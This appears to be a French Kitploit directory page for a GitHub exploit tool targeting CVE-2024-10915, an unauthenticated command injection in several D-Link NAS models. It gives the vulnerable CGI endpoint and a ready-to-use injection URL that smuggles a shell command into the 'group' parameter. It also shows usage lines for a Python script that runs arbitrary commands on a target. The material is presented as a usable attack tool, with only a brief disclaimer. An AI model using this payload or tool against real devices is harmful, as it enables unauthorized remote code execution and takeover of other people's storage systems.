Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10915 | Kitploit
Outils/GitHubGitHub/r0otk3r/cve-2024-10915
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10915 - Exploit d'injection de commandes sur NAS D-Link

Cet exploit basé sur Python cible une vulnérabilité d'injection de commandes dans plusieurs produits NAS D-Link via le point de terminaison /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. La vulnérabilité permet à des attaquants non authentifiés d'exécuter des commandes système arbitraires sur l'appareil affecté.

Description

CVE-2024-10915 affecte plusieurs modèles de NAS D-Link. Un attaquant peut injecter des commandes via le paramètre group de la commande cgi_user_add, conduisant à une exécution de code à distance.

Produits affectés

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
Point de terminaison vulnérable : /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Exemple :

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

Prérequis

  • Python 3.x

  • bibliothèque requests

Installer les dépendances requises :

root@kitploit:~
pip3 install requests

Utilisation

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

Options :

Exemple 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

Exemple 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

Exemple 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ Avertissement

Ce projet est destiné uniquement à des fins éducatives et de tests autorisés. N'utilisez pas cet outil sur des réseaux ou des systèmes pour lesquels vous ne disposez pas d'une autorisation explicite. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés.


Chaînes officielles

  • YouTube @rootctf
  • X @r0otk3r
Télécharger l’outil
OptionDescription
-u / --urlURL de base de la cible (p. ex. http://192.168.1.100)
-c / --commandCommande à exécuter sur l'appareil (défaut : id)
-p / --proxyUtiliser un proxy HTTP (p. ex. http://127.0.0.1:8080)
-o / --outputEnregistrer la réponse HTTP dans un fichier
-l / --listLister les produits NAS D-Link affectés